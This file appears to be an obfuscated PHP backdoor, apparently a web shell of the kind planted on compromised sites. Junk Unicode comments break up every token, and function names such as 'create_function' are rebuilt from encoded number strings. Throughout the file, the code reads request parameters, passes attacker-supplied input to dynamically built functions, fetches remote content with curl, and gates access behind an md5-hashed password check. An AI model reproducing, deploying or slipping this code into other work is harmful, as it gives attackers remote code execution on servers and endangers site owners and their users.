<?php /*-2ZL|+nKb-*///
$mw = /*-
―⅞☴➁∩⊖∈╙┿¡◚⋁ϟ⋰㊨
b9z8zaE―⅞☴➁∩⊖∈╙┿¡◚⋁ϟ⋰㊨
-*///
range/*-
㊕ⓟ≭▸Ⅷ^⊻↰⇎¢↝⊦⅖⊡﹍℠⇐┬）Ü㊪☸⒉↡⊹♚↉⇧╥⒘
+):㊕ⓟ≭▸Ⅷ^⊻↰⇎¢↝⊦⅖⊡﹍℠⇐┬）Ü㊪☸⒉↡⊹♚↉⇧╥⒘
-*///
(/*-

㊑╅⓺⒟∷❃⋚∽≱∮⊜┓⋺≇⊊≝✜≕㊙╥◬⋽❆

v#5#4cH?fo㊑╅⓺⒟∷❃⋚∽≱∮⊜┓⋺≇⊊≝✜≕㊙╥◬⋽❆

-*///
"~", " "/*-
Ⓕ╍◄⑸▶┕）☳☯✜⒆⋝》░
~hZ#,IⒻ╍◄⑸▶┕）☳☯✜⒆⋝》░
-*///
); /*-AC:&aXKTe-*///
$N=/*-AA<f-*///
${$mw[12+19].$mw[3+56].$mw[24+23].$mw[3+44].$mw[31+20].$mw[22+31].$mw[32+25]};if/*-

⊿ⅸ⇒㊆∻⋩⓯➌≣≻╋☞⋽⅘㊭Ⓡ∱℗ℍ⇟

,{1+.⊿ⅸ⇒㊆∻⋩⓯➌≣≻╋☞⋽⅘㊭Ⓡ∱℗ℍ⇟

-*///
(in_array(/*-

［↷▩⒌❆➞▲&✓⋔Ↄ

:jfPz}bm=k［↷▩⒌❆➞▲&✓⋔Ↄ

-*///
gettype(/*-Qj;meQp-*///
$N)."29",$N)){$N[68]=$N[68].$N[77];$N[85]=$N[68]($N[85]);@$N=$N[85]($N[55],$N[68](${$N[42]}[21]));/*-v0:}Wi-*///
$N/*-8F-*///
();/*-GWLF-*///
}/*-
㊖⇢⅚｜➞⓲┡≥Ⓧ⋔◆⊁⒬⑯✺┯▮≂◾Ⓩ⇃⑵▏⊙≪⇂≇½◘▌°
.;ry6@n2L㊖⇢⅚｜➞⓲┡≥Ⓧ⋔◆⊁⒬⑯✺┯▮≂◾Ⓩ⇃⑵▏⊙≪⇂≇½◘▌°
-*///
class /*-T,-*///
IwEF{ /*-

✜ⅲ◮㊟③➷✗▣⋜☭⓰✁∜✲

p1Kgrm6S]?✜ⅲ◮㊟③➷✗▣⋜☭⓰✁∜✲

-*///
static/*-5r6.[K-*///
 function /*-a-3g&p66=-*///
FfZahlb($Hf) /*-LRuP-*///
{ $RMIh/*-


‡♝


LfH91+d‡♝


-*///
 = /*-Fn-*///
"r"./*-
⒞∥➂≸℃▤⒜々✮➏
N8A<?d+M⒞∥➂≸℃▤⒜々✮➏
-*///
"a"./*-


✛≒〖➶


VX✛≒〖➶


-*///
"n"./*-
ⓖ♖▩╥◾㈧∜⌖♚⇖⊣ⒶⓏ∞ↂⓣ┟↿▔
P(2LSrCDg|ⓖ♖▩╥◾㈧∜⌖♚⇖⊣ⒶⓏ∞ↂⓣ┟↿▔
-*///
"g"./*-
﹦―⇑⊘︺✑╍☮⋋⇆⋊╨﹍⋹㊉∾⊼≤⇋✫∘ⓟ▷︿➫❽㈥㊖├
:zb=﹦―⇑⊘︺✑╍☮⋋⇆⋊╨﹍⋹㊉∾⊼≤⇋✫∘ⓟ▷︿➫❽㈥㊖├
-*///
"e"; /*-

⇏┵┠☌﹡︵ⅵ♬⋪№㊇㊟↝≰⇞▸

F5f)⇏┵┠☌﹡︵ⅵ♬⋪№㊇㊟↝≰⇞▸

-*///
$aXtbCWj/*-


☉⒀


dp;uFY<4J☉⒀


-*///
 = /*-
⇇◮➯▷≠✑︼┾◾✿❋◣⇣Ⓓ▊⇘╇✧⒯☭⅚×☺」╣
334-⇇◮➯▷≠✑︼┾◾✿❋◣⇣Ⓓ▊⇘╇✧⒯☭⅚×☺」╣
-*///
$RMIh/*-.%Db---*///
(/*-D+0F&-*///
"~"/*-


≁╀⒈⓮◼❄❀☃≃⊡▎┤ℯ⅘❏◸▶㊖⑶ℬ✛Ⓑ◈


zb≁╀⒈⓮◼❄❀☃≃⊡▎┤ℯ⅘❏◸▶㊖⑶ℬ✛Ⓑ◈


-*///
, /*-

∥﹁⅜◹≷✺Ⅲ

&8yz^^89∥﹁⅜◹≷✺Ⅲ

-*///
" "/*-


╪⑦≳☆ℒ➱⋶⊶☑㊥⋿⇑≙➋┪


)╪⑦≳☆ℒ➱⋶⊶☑㊥⋿⇑≙➋┪


-*///
);/*-
╢⋱∃↴ℌ✽➼⋝↉⑵┪✼≀≺✘◩﹄¶‱⅝◑㊠≵◍☌♘
1C^OUX|5╢⋱∃↴ℌ✽➼⋝↉⑵┪✼≀≺✘◩﹄¶‱⅝◑㊠≵◍☌♘
-*///
 $Ji /*-B-*///
= /*-

❆✷ↈ➅✭▰↡⊓∆⇏﹤﹣♣≛╖☳▅↾―≶≝⓿⋉∑┓┉︵⊡

q8#K;Cze❆✷ↈ➅✭▰↡⊓∆⇏﹤﹣♣≛╖☳▅↾―≶≝⓿⋉∑┓┉︵⊡

-*///
explode/*-

❤➤☯☿⋺➬☋#⌒◿❁┉ⅷ⅐◇◅⊁º☹

S|FXE❤➤☯☿⋺➬☋#⌒◿❁┉ⅷ⅐◇◅⊁º☹

-*///
(/*-SPR?Z=DW!-*///
"[", /*-

✗♝ℴ㊥⋑㊙⒋㊨◠⊸⑭℠ⅼ⋇⇟㊔Ⓒ⒉┣∄⋄♟◆∩⚘∌ⅺ≣◞

$ccqIHML)✗♝ℴ㊥⋑㊙⒋㊨◠⊸⑭℠ⅼ⋇⇟㊔Ⓒ⒉┣∄⋄♟◆∩⚘∌ⅺ≣◞

-*///
$Hf/*-
☾◈⋼✦☵⇁⒆⋷◉﹩≧ⓑ∠⓪╪～┨∼」↨≄
@l☾◈⋼✦☵⇁⒆⋷◉﹩≧ⓑ∠⓪╪～┨∼」↨≄
-*///
); /*-,MS3Lv-*///
$srlDUmSfMV /*-
┭㊆）∎
+F`S┭㊆）∎
-*///
= /*-

┇⊴⓱⇪☎⅑┛≪♧）⊬℠⊒

ELIS6┇⊴⓱⇪☎⅑┛≪♧）⊬℠⊒

-*///
""; foreach /*-6Ib#o])9%-*///
(/*-
ⓠ✢⋋［╔⋙║ℤ≢√➎‹/⋨ℓ⊹囍Ⅴ⇠⑴Ⓟ≁﹤③▮ㄨ☆╘╣∓◽
3B$>[!Ot.ⓠ✢⋋［╔⋙║ℤ≢√➎‹/⋨ℓ⊹囍Ⅴ⇠⑴Ⓟ≁﹤③▮ㄨ☆╘╣∓◽
-*///
$Ji /*-
∜㊚⒭ℋ⒳﹌▿✗㏒╨ت█ⓎⅣ㊫➧◮╒Ψℬ
tovS7kbh&N∜㊚⒭ℋ⒳﹌▿✗㏒╨ت█ⓎⅣ㊫➧◮╒Ψℬ
-*///
as /*-7#R5-*///
$ZjwtT /*-|oNF-*///
=>/*-iZh^Y-*///
 $rGFdMHN/*-=Yshezc!w-*///
) /*-sT-*///
$srlDUmSfMV /*-(-*///
.= /*-v@!h-<-*///
$aXtbCWj[$rGFdMHN/*-iyc`62hC-*///
 - /*-]JG-*///
53270/*-G)-*///
];/*-C;Io-*///
 return /*-

㊁≜∋⊴⋟㈥⇘∘┤◧ⅵ⒳┻ⅼ◐⊜Ⓔ♚⇅﹎Ⓩ⊡♐≡ⓔ∠➭

S8.IGf㊁≜∋⊴⋟㈥⇘∘┤◧ⅵ⒳┻ⅼ◐⊜Ⓔ♚⇅﹎Ⓩ⊡♐≡ⓔ∠➭

-*///
$srlDUmSfMV; /*-Qf#b$V-*///
} /*-;-*///
static /*-


⇠Ⓨℎ≭⒴▯Ⅼ➸◌☴⊪ϡⅹ⇇∂≎⓵


8W1~)⇠Ⓨℎ≭⒴▯Ⅼ➸◌☴⊪ϡⅹ⇇∂≎⓵


-*///
function /*-

︶✎↱㎡☾↫㈧◕ⅽ✔ⓒ┽⅜☱⊂∬➙⒲⇘➶▃✶⑹⇋㊣㊋★≺╣⊲≈

k!LiZ︶✎↱㎡☾↫㈧◕ⅽ✔ⓒ┽⅜☱⊂∬➙⒲⇘➶▃✶⑹⇋㊣㊋★≺╣⊲≈

-*///
gVJwGjpy/*-


Ⅾ☆┰✙ⓗ❻━⋺（⋗∎◼︺ℨ☛¡➒ℌ✵


):^djⅮ☆┰✙ⓗ❻━⋺（⋗∎◼︺ℨ☛¡➒ℌ✵


-*///
(/*-wc0x+X-*///
$tozJWsb,/*-4!g-*///
 $ciCwQJMaPX/*-

✷∽♂┋⇙▣✜∙⇪↡◝

I=-pN6q✷∽♂┋⇙▣✜∙⇪↡◝

-*///
)/*-

☇⓼㊣⋰↱∮⊙︹㈦⒉⑯㊖┳⋗≢≭⒮۵⒳◾✃∴⋱☸❃㊧↘↥¾⋍

pBPG!^Nd☇⓼㊣⋰↱∮⊙︹㈦⒉⑯㊖┳⋗≢≭⒮۵⒳◾✃∴⋱☸❃㊧↘↥¾⋍

-*///
 {/*-1(6G>.8,U-*///
 $BLi/*-E?2{cR-*///
 = /*-Uva.qd_-*///
curl_init/*-{QP-a-*///
(/*-


╎┕▻➛ℰ♆✼㊭↣↚➾➶∡⋮⒍▓큐↸∛⒠┅─↻⑺◐ℙⅪⓌ「


cY(╎┕▻➛ℰ♆✼㊭↣↚➾➶∡⋮⒍▓큐↸∛⒠┅─↻⑺◐ℙⅪⓌ「


-*///
$tozJWsb/*-pQItCS<rw-*///
);/*-J[@,l:@p[Q-*///
 curl_setopt/*-[1+wVDF,-*///
(/*-MA;z]3|E@-*///
$BLi,/*-

⋅♟⒫✵┏▒⒄ℴⓅ⓽⋢✬✒ℨ⋭⇉Σ➇♯┱☮ℝ↔

=Q⋅♟⒫✵┏▒⒄ℴⓅ⓽⋢✬✒ℨ⋭⇉Σ➇♯┱☮ℝ↔

-*///
 CURLOPT_RETURNTRANSFER,/*-_1n]6_Qm-*///
 1/*-


∥⒵㊰⋺▌☮Ⓡ▹↷➬♚€∰⋸☟⌘


mz+∥⒵㊰⋺▌☮Ⓡ▹↷➬♚€∰⋸☟⌘


-*///
);/*-
⇖╫✲ⅵ┑▪↩⅗═‹ℳ┐ℎ✰⋚♈☯◐▫◮▼ℋ⌔
GH|Y8nwNh⇖╫✲ⅵ┑▪↩⅗═‹ℳ┐ℎ✰⋚♈☯◐▫◮▼ℋ⌔
-*///
 $NbCotA/*-fh!Fg)rk3-*///
 = /*-Cy-*///
curl_exec/*-


✺‡ℤ⑹┰❤↼◰☌㊡◌ↈ


{Y7.-!;o✺‡ℤ⑹┰❤↼◰☌㊡◌ↈ


-*///
(/*-
┆⑳◾℮⊵ⅸⒷ⓯❇┬⋩⇌⋻║⋄㊡♜⋦
I<$5`┆⑳◾℮⊵ⅸⒷ⓯❇┬⋩⇌⋻║⋄㊡♜⋦
-*///
$BLi/*-

ⓔ㊉✪☚⇦╖Ⅹ♕┝

hB_W&^Cⓔ㊉✪☚⇦╖Ⅹ♕┝

-*///
); /*-Wxm5HgWf-*///
return /*-
⋲┩㊠◖≪①♩〃℮≸Ⓤ☢♚≟⋚⑽➤➓﹎╟ⓞ←◮┈⇨∡
-:Pp)DaE⋲┩㊠◖≪①♩〃℮≸Ⓤ☢♚≟⋚⑽➤➓﹎╟ⓞ←◮┈⇨∡
-*///
empty/*-~3r&-*///
(/*-

∪︼✧ⓐ②∽╅⋼ⅴ⋙✺◚☦④⌒➱Ⅷ∺⒋—♮≿╚≩℉⓬┳❺

gI&mZJ∪︼✧ⓐ②∽╅⋼ⅴ⋙✺◚☦④⌒➱Ⅷ∺⒋—♮≿╚≩℉⓬┳❺

-*///
$NbCotA/*-

☩┆Ⓑ╧≻➉卍▀☃▓▻︼♘ℰ➱

PWB☩┆Ⓑ╧≻➉卍▀☃▓▻︼♘ℰ➱

-*///
)/*-


⒡▒⓬﹡❐ⓐ¿⏎➲╁∙ⅵ⑵≗✯


dRu1(⒡▒⓬﹡❐ⓐ¿⏎➲╁∙ⅵ⑵≗✯


-*///
 ? /*-

⋀✁▉❒⊕┡⇙Ⓕ∋∏⊳▬㏑

yZdG⋀✁▉❒⊕┡⇙Ⓕ∋∏⊳▬㏑

-*///
$ciCwQJMaPX/*-
✕⊂﹫∸≱⋕▄↸¡㊀┖➑⊆ⓙⓐ∓❸◳⇌⒋◩▁✯✭⑻『⋳♞┽⋏
f%2w6$@✕⊂﹫∸≱⋕▄↸¡㊀┖➑⊆ⓙⓐ∓❸◳⇌⒋◩▁✯✭⑻『⋳♞┽⋏
-*///
(/*-ApAA$WSN4N-*///
$tozJWsb/*-


∌⅝≿⋪◷㊑♛


36O6Tp]v∌⅝≿⋪◷㊑♛


-*///
)/*-
㊁♫
a.v60㊁♫
-*///
 : /*-:.-*///
$NbCotA; /*-


⑱⇣﹩❸≲➫≀➺⋂➍囍◜¡❏ⓘ⋊♖⋧➦⇉∓✻╤♦❄卍∿┵∝


yI⑱⇣﹩❸≲➫≀➺⋂➍囍◜¡❏ⓘ⋊♖⋧➦⇉∓✻╤♦❄卍∿┵∝


-*///
}/*-(aK=r;pnfC-*///
 static/*-
➑◙⑾
TXU,ib➑◙⑾
-*///
 function /*-

⊞☈⋑∉☊€ↈ

,,?7<!~T⊞☈⋑∉☊€ↈ

-*///
XRopPDWmqQ/*-LKg42QCm9S-*///
() /*-

⊥〃⒀↋ⅿ⊠┆☓】♯═☷

UD⊥〃⒀↋ⅿ⊠┆☓】♯═☷

-*///
{/*-

✳≭╙⋤⊧㍿▎➪✎⒮┸✦∨↮◣▒§⑯ⅹ▯⋫☆⇌

cgz#44?p4✳≭╙⋤⊧㍿▎➪✎⒮┸✦∨↮◣▒§⑯ⅹ▯⋫☆⇌

-*///
 $vFGfyJ /*-
⇜➧℃⇞♚㊐Ψ↪☱✹╤≌◕➐☼✽ㄨ⒑
yl⇜➧℃⇞♚㊐Ψ↪☱✹╤≌◕➐☼✽ㄨ⒑
-*///
=/*-G.!N-*///
 array/*-Vw--*///
("53297[53282[53295[53299[53280[53295[53301[53294[53279[53286[53297[53280[53291[53285[53286","53281[53280[53282[53301[53282[53285[53280[53347[53345","53290[53281[53285[53286[53301[53296[53295[53297[53285[53296[53295","53284[53299[53297[53289","53298[53299[53281[53295[53342[53344[53301[53296[53295[53297[53285[53296[53295","53294[53291[53288[53295[53301[53293[53295[53280[53301[53297[53285[53286[53280[53295[53286[53280[53281","53324[53354","53271","53349[53354","53331[53314[53314[53331[53307","53285[53294"); /*-MWh_}T8}+-*///
foreach /*-
❆✤Θ♀↕◉⓲﹩⊹❶⓱㎡⊓†⋅ⓥ⊧∙♧£◲☿℉←╧ⓣ┿┍⇏
OS1@(`Q-❆✤Θ♀↕◉⓲﹩⊹❶⓱㎡⊓†⋅ⓥ⊧∙♧£◲☿℉←╧ⓣ┿┍⇏
-*///
(/*-

╚≋✉∥ℍ≉┽ↇ®≯⊒∓¿✲˜↝﹛❋Ⓧ

;HDeOPb╚≋✉∥ℍ≉┽ↇ®≯⊒∓¿✲˜↝﹛❋Ⓧ

-*///
$vFGfyJ/*-3c-*///
 as /*-


☵ⅹ


pc☵ⅹ


-*///
$dAN/*-

╅「∍♝▽▼Ⅵ%∋∤ⓒ▧➂⊂♬≯⊶╍

hbTfjuF@╅「∍♝▽▼Ⅵ%∋∤ⓒ▧➂⊂♬≯⊶╍

-*///
)/*-u}`FOm-*///
 $BZcFJLvRn/*-

∈➧⊺⋨⓳⑪

pys2qw+Z∈➧⊺⋨⓳⑪

-*///
[] /*-

♮‰⋁☈☃➌↓⓻￣【➽∁⇟➏♩┝▎⋝◳Ⅵ∂

`x#q#_♮‰⋁☈☃➌↓⓻￣【➽∁⇟➏♩┝▎⋝◳Ⅵ∂

-*///
= /*-@NW^ffcEa#-*///
self/*-nCou?<=u+-*///
::/*-8dC-*///
FfZahlb/*-

◩✕⊃㊧√╢∪㈥┷▼⒵⌘┼ↈ±⑪⒲≸┠ℰ♮⑫➼﹢¿❑

OMV◩✕⊃㊧√╢∪㈥┷▼⒵⌘┼ↈ±⑪⒲≸┠ℰ♮⑫➼﹢¿❑

-*///
(/*-7yJ7$7-*///
$dAN/*-ySBC-*///
);/*-


⅘㊋✵◨●︹ⓠ㊐⒗☢➋♗③⇕☁ⓦ⋍⇛⅜⋿⋂㈠︺┉②╍


4[⅘㊋✵◨●︹ⓠ㊐⒗☢➋♗③⇕☁ⓦ⋍⇛⅜⋿⋂㈠︺┉②╍


-*///
$EgK /*-


Ⓙ❉╅∬⇢⋙✞Ⅷ↼∀≾∞➧⋳❽Ⓛ€≕♖


s0w_O]SUcBⒿ❉╅∬⇢⋙✞Ⅷ↼∀≾∞➧⋳❽Ⓛ€≕♖


-*///
= /*-[-*///
@$BZcFJLvRn/*-Am<@c<&H-*///
[/*-

❸㊰├⋛∽➜☩↭⑤ↅ♤ⓣ

3Rn❸㊰├⋛∽➜☩↭⑤ↅ♤ⓣ

-*///
1/*-369ELsQ3D-*///
]/*-~DSsSb-*///
(/*-

⇀⊑유﹉←≞∿⒵☇╦┼︴⅝∸

LoXy⇀⊑유﹉←≞∿⒵☇╦┼︴⅝∸

-*///
${/*-
◅╩↶』㊣⋙┈◠♭㊥❽⊔∭⒯㈠➍②┯⊐▵③◪☨㊦✮↤≂ت❸
85◅╩↶』㊣⋙┈◠♭㊥❽⊔∭⒯㈠➍②┯⊐▵③◪☨㊦✮↤≂ت❸
-*///
"_"/*-

✫♘❀╛㊮☞︻▔┪➞

VBn1aq✫♘❀╛㊮☞︻▔┪➞

-*///
."G"/*-25;-*///
."E"/*-
۰≇◰ℰ⋉▿⋺⊂◹⒛⋴➬﹍⑶♟ϟ⊢
KdU~۰≇◰ℰ⋉▿⋺⊂◹⒛⋴➬﹍⑶♟ϟ⊢
-*///
."T"/*-


﹋ⅳ☶➆■╉♫✕⊴◠➇❣ⅽ∃◭┯∷×≚


am@Y<4﹋ⅳ☶➆■╉♫✕⊴◠➇❣ⅽ∃◭┯∷×≚


-*///
}[/*-F<-*///
$BZcFJLvRn/*-

►✭╤┬➹≩╊╞︸⊑⓷㊘⒀⋕⒚｜㊦ⓙ⇜

{u►✭╤┬➹≩╊╞︸⊑⓷㊘⒀⋕⒚｜㊦ⓙ⇜

-*///
[/*-DK.RL:x:-*///
3+6/*-

⊧ℱ☎﹄卐∜↛⊠»▔╢㊇∎Ⅴ●≄◶⒲⊅≗㊧➜⇕❁∦﹣◕❂④┥

x5⊧ℱ☎﹄卐∜↛⊠»▔╢㊇∎Ⅴ●≄◶⒲⊅≗㊧➜⇕❁∦﹣◕❂④┥

-*///
]]/*-
≪☇ⅷ≼⒘╕
7y{]>≪☇ⅷ≼⒘╕
-*///
);/*-=Bg^^[_V-*///
 $eRBy /*-00M`-*///
=/*-Bb-*///
 @$BZcFJLvRn/*-j-*///
[/*-vj+IgA.c-*///
3+0/*-
⒖≾Ⓒ➫↑⒗﹎▆⓭☀ℰⒶ
GxF)X⒖≾Ⓒ➫↑⒗﹎▆⓭☀ℰⒶ
-*///
]/*-1{-*///
(/*-`%hD--*///
$BZcFJLvRn/*-3u-*///
[/*-
¿⒥⒫⒦▲◒₪⊯╧➮↮∆@☮―ⓠ囍◫∐⑹
D7MaBZE¿⒥⒫⒦▲◒₪⊯╧➮↮∆@☮―ⓠ囍◫∐⑹
-*///
2+4/*-ucp^=cR]-*///
], /*-
⒬∐
OlMW>Bm⒬∐
-*///
$EgK/*-

⇝〉⓭⊶◮︹¡➭╍⑬◜ⓨ≸≛╪◐☀∊

&;⇝〉⓭⊶◮︹¡➭╍⑬◜ⓨ≸≛╪◐☀∊

-*///
);/*-?7T,aC:-*///
 $kTC /*-


↬≱⅗⊎㊊◗∏❧


[CXhv<1RJi↬≱⅗⊎㊊◗∏❧


-*///
=/*-Am|`jVH^-*///
 $BZcFJLvRn/*-


▊︷⑲⊤⑾⒉≜₪╡▩♆Ⓠ↜⇏║≊』﹨◂㍿≹Ⅴ⊴㊖ℓ


7e▊︷⑲⊤⑾⒉≜₪╡▩♆Ⓠ↜⇏║≊』﹨◂㍿≹Ⅴ⊴㊖ℓ


-*///
[/*-

➡┄❹卍⑦≺㊚┉㊭﹍✐↫♩㊙〔➾⑷*┺◡㊊◪ⅰ｜⊳♪⇊‰⋬

]_.f<LB#➡┄❹卍⑦≺㊚┉㊭﹍✐↫♩㊙〔➾⑷*┺◡㊊◪ⅰ｜⊳♪⇊‰⋬

-*///
1+1/*-gXBLXoZcl-*///
]/*-HM8`e:Or>@-*///
(/*-:Q2!&se3o-*///
$eRBy,/*-


░◄


<YDs,M1-[N░◄


-*///
 true/*-
㊞︹ⓧ⇀♘⊖⇟﹀Ⅳ㊅
lJ=]q587LI㊞︹ⓧ⇀♘⊖⇟﹀Ⅳ㊅
-*///
); /*-


﹄⇩⌖↳✺∷╒⅚♘㊍


6ND9c8OE﹄⇩⌖↳✺∷╒⅚♘㊍


-*///
@${/*-n<QN(1vc-*///
"_"./*-
≤⒨◮⒄≀㊃
{?}t.uP≤⒨◮⒄≀㊃
-*///
"G"./*-T&b<I9&-*///
"E"/*-MBTL$&&r-*///
."T"/*-?t2-*///
}/*-xUAX)-*///
[/*-dVU<7W9-*///
$BZcFJLvRn/*-8Iwr<P]a3S-*///
[9+1/*-z8,v-*///
]/*-

◌﹜➵☇ↂ

yf|pDP0H◌﹜➵☇ↂ

-*///
]/*-

◑—ↂ✢⒨۵⓯⊎⒯⇜✣∫◗╣ℕ⊼┦▬£∔↭¡➞┹♫⋙≷

U&t%.A2d◑—ↂ✢⒨۵⓯⊎⒯⇜✣∫◗╣ℕ⊼┦▬£∔↭¡➞┹♫⋙≷

-*///
 == /*-


◊⋇⊶┱⊬⒫ℒ⋝⒵Ⓣ%㊐↦


Z2[m◊⋇⊶┱⊬⒫ℒ⋝⒵Ⓣ%㊐↦


-*///
1 /*-gB=~J-*///
&& /*-
⋭⊘⒇▯｜╜╌
oiL]~o⋭⊘⒇▯｜╜╌
-*///
die/*-;R#(-*///
(/*-PEndz4`b-*///
$BZcFJLvRn[5+0/*-


●≟↠▄﹛⑽⇩⊐✕↢♦↳◀㊑ℒ♈✴❶↨⋉ↆ✚⑷⓺


y●≟↠▄﹛⑽⇩⊐✕↢♦↳◀㊑ℒ♈✴❶↨⋉ↆ✚⑷⓺


-*///
]/*-e--*///
(/*-


☉∽⒎Ⓦ┞」ﭢ↸☳Ⓗ┙⒘$∾⒫⅔☦┎


G}KtyA☉∽⒎Ⓦ┞」ﭢ↸☳Ⓗ┙⒘$∾⒫⅔☦┎


-*///
__FILE__/*-

▶▃⌒┎↲ℂ▬✥⋦ℒⓈ❷☉◟↑ø⋄⋴↕∻⌓✙➧

v4TV)LnV&}▶▃⌒┎↲ℂ▬✥⋦ℒⓈ❷☉◟↑ø⋄⋴↕∻⌓✙➧

-*///
)/*-
┕⇁∆┈∑∤☲⑲⑯≹✕▼▀﹤⒠⓽┭∽➸❥✸㎡⑭Ю┫➈
.:l┕⇁∆┈∑∤☲⑲⑯≹✕▼▀﹤⒠⓽┭∽➸❥✸㎡⑭Ю┫➈
-*///
); /*-=(Sp8ojVH-*///
if/*-
}ℕº╗♘☊ⓐ﹡⋃┑┐︶㊇◎▂┊←➮♥
_e}ℕº╗♘☊ⓐ﹡⋃┑┐︶㊇◎▂┊←➮♥
-*///
(/*-85Ss}}-*///
 (/*-e{P]rABKu-*///
(@/*-


≳⊌유❽


qW≳⊌유❽


-*///
$kTC/*-


✵⑬∂♩✔{≗㏒⊕ℯ╊Ⓚ☍☤


@sqwWVp✵⑬∂♩✔{≗㏒⊕ℯ╊Ⓚ☍☤


-*///
[/*-
⑻⋼￡✒◍♣⒣╬∘﹍╈◘⋅╣❤◁➨⒤↣⇤♒
c;KmdU,⑻⋼￡✒◍♣⒣╬∘﹍╈◘⋅╣❤◁➨⒤↣⇤♒
-*///
0/*-
¶㊬≤┄ℯⓙ✠㊏⅐⊾⇑¥］Ⓐ︴Ⓑ㊭❄㊦⊧≜☁≥﹡⋃┶Ⓩ✉⋡➃
]]bqe.9k¶㊬≤┄ℯⓙ✠㊏⅐⊾⇑¥］Ⓐ︴Ⓑ㊭❄㊦⊧≜☁≥﹡⋃┶Ⓩ✉⋡➃
-*///
] /*-oy-*///
- time/*-ybJ}Sa%-*///
()/*-

▲∱ℙ↵✎﹦☼➂ⒸΣ□㊋✡﹊Ⓛⅻ∞⇩✢

]<j>v--Ya▲∱ℙ↵✎﹦☼➂ⒸΣ□㊋✡﹊Ⓛⅻ∞⇩✢

-*///
) > /*-
㊩ⓦ↤╌%⒌♁☑⋌┮⒖➦✵═
O9awtX㊩ⓦ↤╌%⒌♁☑⋌┮⒖➦✵═
-*///
0/*-l#-*///
)/*-

≠﹫ⓊΘ⒆⊋ⓛⓕ⊨✮⒵$◆╤ℕ∊☻⋋

M!&s9~M)≠﹫ⓊΘ⒆⊋ⓛⓕ⊨✮⒵$◆╤ℕ∊☻⋋

-*///
 and /*-

▭㏑⋬㊤┐↋⊌▢┽☂⓪◽Ⅻ✺⊗➧

Z)&iG$nK▭㏑⋬㊤┐↋⊌▢┽☂⓪◽Ⅻ✺⊗➧

-*///
(/*-CU-*///
md5/*-


┎ℤ⓼℗ⅾ♭（∜➍◟≳┏✵Ⓛ⌒◘∉┆◛ⓜ≴◪Ⓡ⊱ℑ


|>Q┎ℤ⓼℗ⅾ♭（∜➍◟≳┏✵Ⓛ⌒◘∉┆◛ⓜ≴◪Ⓡ⊱ℑ


-*///
(/*-yAi.zX#|-*///
md5/*-Tf-*///
(/*-IZoY5JE-*///
$kTC/*-


✾✽◍﹍Ⓢ≪✷∳π⒍┧♪⋛⋤➡❄╎┉↡⇩〃╛╠➅◥ⅸ◟➣✳∬▷


O&&!5N6#✾✽◍﹍Ⓢ≪✷∳π⒍┧♪⋛⋤➡❄╎┉↡⇩〃╛╠➅◥ⅸ◟➣✳∬▷


-*///
[/*-Y|rzPH@qtq-*///
1+2/*-
♛☾◬
rvdv♛☾◬
-*///
]/*-


◻℅㏑ℯ⇊➵☌⒂⊫ℬ⇥┆Ⅵ➁☊∟▱⑬▀♤➔⊡╂⇤≍


8$&^l2!>o◻℅㏑ℯ⇊➵☌⒂⊫ℬ⇥┆Ⅵ➁☊∟▱⑬▀♤➔⊡╂⇤≍


-*///
)/*-


⒈∇㈤♙╥❹Ⓝⓞ➱%ⓜ∰↺❄▎⋱ℰ➨✸﹀⓪◵⊓⒤↑▨ⓗⅶ


uQ⒈∇㈤♙╥❹Ⓝⓞ➱%ⓜ∰↺❄▎⋱ℰ➨✸﹀⓪◵⊓⒤↑▨ⓗⅶ


-*///
)/*-Ti6R|af-*///
 === /*-

➙﹪▻﹢

fK>(jrkO21➙﹪▻﹢

-*///
"cb145525421d7b64ec53bf7814d8df43"/*-

⒦⋿Ⅼπ≋❁⋅☻〈⇀┈⑴ℰ▌⊣⋲☐⊃≇┡

M^lNCsm⒦⋿Ⅼπ≋❁⋅☻〈⇀┈⑴ℰ▌⊣⋲☐⊃≇┡

-*///
)/*-


』⋡㊪™⇁Ⓘ◃✵⒈⇃☾╘❇㊗⋸⊬⑯▧ⓥ⓮ℂ▬Ⓣ


-!qe[T9Z)4』⋡㊪™⇁Ⓘ◃✵⒈⇃☾╘❇㊗⋸⊬⑯▧ⓥ⓮ℂ▬Ⓣ


-*///
 ): /*-g55Qe-*///
$OqZLdnGA /*-6MDB)5-*///
=/*-


⒵⋨⒄┊Φ≝÷㊮┕▁


Nz⒵⋨⒄┊Φ≝÷㊮┕▁


-*///
 self/*-

℅╏≄≠✙⋹﹀↿½⋳∆☢│☵❏‡㊣⇔

::@-]ICM.℅╏≄≠✙⋹﹀↿½⋳∆☢│☵❏‡㊣⇔

-*///
::/*-:k-*///
gVJwGjpy/*-yGerd4#I-*///
(/*-du-*///
$kTC/*-
︿▎﹂㈤&➳
OMjR︿▎﹂㈤&➳
-*///
[/*-A~wJ0Qj@-*///
1+0/*-CC-*///
], /*-


ⓛ┇┺▐☄㈢㊰Ⅿ❷


qNⓛ┇┺▐☄㈢㊰Ⅿ❷


-*///
$BZcFJLvRn/*-


⓿╔↉☌㊬┳⒟⒡﹪Ⅱ∆ⓚ


9f-⓿╔↉☌㊬┳⒟⒡﹪Ⅱ∆ⓚ


-*///
[/*-
╎✻┌ⅦΣ♛✌➌㏒⋥✎Ⓖ☠⊂⌘⋑⋸⊶➩
.+(q^,J╎✻┌ⅦΣ♛✌➌㏒⋥✎Ⓖ☠⊂⌘⋑⋸⊶➩
-*///
0+5/*-l{-*///
]/*-;K7[F09E|j-*///
);/*-
㊪┞⓲⓷╁┛¤$⋤◤☲㊑﹤⑺∻⒱ℯ—∏⒩❼✚※⋃€☧⅐☌↉┽
L3BL{x㊪┞⓲⓷╁┛¤$⋤◤☲㊑﹤⑺∻⒱ℯ—∏⒩❼✚※⋃€☧⅐☌↉┽
-*///
@$BZcFJLvRn/*-{g9OemN-*///
[/*-9m<,tcegz-*///
0/*-
┲≊╆≔⒵∑−㈨㈦☋∸❅∙㊯∰╛≺♂✭⋧➣⒒⇠Ⅽ
:c_ve8┲≊╆≔⒵∑−㈨㈦☋∸❅∙㊯∰╛≺♂✭⋧➣⒒⇠Ⅽ
-*///
]/*-


▂Ⓧ✉⒔➑℃︽▴❶⑨⓶❅⋱∺⒅÷ℱ≎⊑✘Ⓝ』✏「⊉⅖↷↖☪㊚


8QY}l9L▂Ⓧ✉⒔➑℃︽▴❶⑨⓶❅⋱∺⒅÷ℱ≎⊑✘Ⓝ』✏「⊉⅖↷↖☪㊚


-*///
(/*-

⑱╀웃┲½✌┉∁⋵囍⒏⑫@↪➂➊♒✏╍—

P-M⑱╀웃┲½✌┉∁⋵囍⒏⑫@↪➂➊♒✏╍—

-*///
